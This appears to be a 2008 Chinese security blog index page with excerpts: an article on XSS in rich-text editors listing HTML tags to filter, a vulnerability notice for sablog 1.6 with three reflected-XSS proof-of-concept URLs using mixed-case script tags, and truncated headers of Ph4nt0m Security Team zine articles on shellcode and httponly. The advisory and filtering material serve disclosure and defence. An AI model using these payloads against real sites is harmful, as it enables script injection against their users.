鬼仔's Blog

来源：Neeao's Security Blog

富文本编辑器是一个开放式的HTML内容编辑环境，必须实现文字样式、链接、图片等功能的HTML，所以用户 POST的内容必须含有HTML标签，但是任由用户输入各类HTML标签，会造成一些潜在的恶意脚本攻击，借这类情况正好分析出现XSS的情况，主要针对 IE浏览器.

一.首先是微软建议我们可能造成恶意脚本攻击的标签.

类似如下的

tag:

applet
base
basefont
bgsound
blink
body
embed
frame
frameset
head
html
ilayer
iframe
layer
link
meta
object
style
title
script

———————————–
阅读全文 »

Date：2008-03-27
Author：amxku[c.r.s.t]
Version:sablog 1.6

由于过滤不严，存在多个跨站漏洞

PS:
http://www.amxku.net/?viewmode=list&curl=>"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>
http://www.amxku.net/?action=index&cid=>"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>
http://www.amxku.net/?action=index&setdate=200804&setday=>"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>&page=1
阅读全文 »

刚才连续发了六篇文章：
1、[PSTZine 0x01][0x01][Introduction]
2、[PSTZine 0x01][0x02][An improvement on mixed case alphanumeric shellcode decoder]
3、[PSTZine 0x01][0x03][做一个优秀的木匠]
阅读全文 »

==Ph4nt0m Security Team==

Issue 0x01, Phile #0x06 of 0x06

|=—————————————————————————=|
|=————-=[ 利用httponly提升应用程序安全性 ]=————–=|
|=—————————————————————————=|
|=——————————— 阅读全文 »

==Ph4nt0m Security Team==

Issue 0x01, Phile #0x05 of 0x06

|=—————————————————————————=|
|=——————=[ Shellcode For Mac OSX (x86) Tips ]=——————-=|
|=—————————————————————————=|
|=———————- 阅读全文 »

==Ph4nt0m Security Team==

Issue 0x01, Phile #0x04 of 0x06

|=—————————————————————————=|
|=———————-=[ 安全幻想曲2008 ]=———————=|
|=—————————————————————————=|
|=————————— 阅读全文 »

==Ph4nt0m Security Team==

Issue 0x01, Phile #0x03 of 0x06

|=—————————————————————————=|
|=———————=[ 做一个优秀的木匠 ]=———————=|
|=—————————————————————————=|
|=——————————– 阅读全文 »

==Ph4nt0m Security Team==

Issue 0x01, Phile #0x02 of 0x06

|=—————————————————————————=|
|=—-=[ An improvement on mixed case alphanumeric shellcode decoder ]=——=|
|=—————————————————————————=|
|=———————- 阅读全文 »